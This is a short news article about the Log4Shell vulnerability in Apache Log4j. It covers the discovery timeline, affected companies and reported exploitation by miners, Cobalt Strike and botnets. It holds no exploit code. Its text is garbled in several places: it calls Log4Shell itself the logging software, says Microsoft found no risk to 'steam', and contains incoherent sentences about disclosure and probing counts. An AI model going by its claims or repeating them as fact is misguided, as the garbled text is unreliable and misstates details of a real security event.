There is a critical security flaw in Log4Shell, an open source logging software that is found in almost every software product. The internet has been put on high alert as attackers ramp up their efforts to target vulnerable systems.
Log4Shell is a zero-day vulnerability that allows attackers to run code on vulnerable server running Log4j, which developers use to keep a record of what's happening inside an application as it runs.
The first big-name victim of Log4Shell was Minecraft, according to initial reports. Two weeks earlier, security researchers found evidence that Log4Shell had been exploited. The flaw was first observed by Talos on December 2, while Cloudflare observed a successful exploit on December 1.
Matthew Prince, co-founder and CEO of Cloudflare, said that the most evidence they have found so far is the Log4j exploit. It was in the wild at least 9 days before it was publicly disclosed. Don't look for evidence of mass exploitation until after public disclosure.
Who is affected?
Thousands of companies and services may be affected by the Log4Shell flaw, according to the growing number of victims. Apple, Amazon, Baidu, Google, IBM,Tesla, Twitter, and Steam are some of the organizations that have been impacted by this. The flaw affects many of the products of VMware, as well as some of the products of Cisco.
Many companies have acted quickly. Microsoft said that it had issued a software update for users of the game, and that it had reviewed its services and concluded that there were no risks to associated steam.
Apple patched its cloud service but did not respond to our request for comment. The exploit for the web interface was no longer working on December 11 after researchers found that it was vulnerable on December 9 and December 10.
The Apache Software Foundation released an emergency security patch for the Log4j software, as well as a number of third-party mitigations.
How bad is the flaw?
As the number of companies and services impacted by Log4Shell grows, so does the number of attacks exploiting the vulnerability. In a post over the weekend, Microsoft said it has observed activities such as installing coin miners, Cobalt Strike to enable credential theft and exfiltration of data from compromised systems.
The number of systems that were probing for Log4Shell on Friday was 100 times greater than the number of different internet addresses detected by the security firm.
Cado Security has seen an increase in exploitation. The company said that on December 11 there were a number of Mirai botnet activities exploiting Log4Shell, as well as Mushtik activity from a number of IP ranges. The company believes that there is a very strong likelihood of targeted ransomware attacks because of the typical chain of events for exploits.
This is likely to be the calm before the storm because of the wide-ranging nature of Log4Shell. Every security team has a priority list.
Apple iCloud, Twitter and Minecraft are vulnerable to a zero-day exploit.
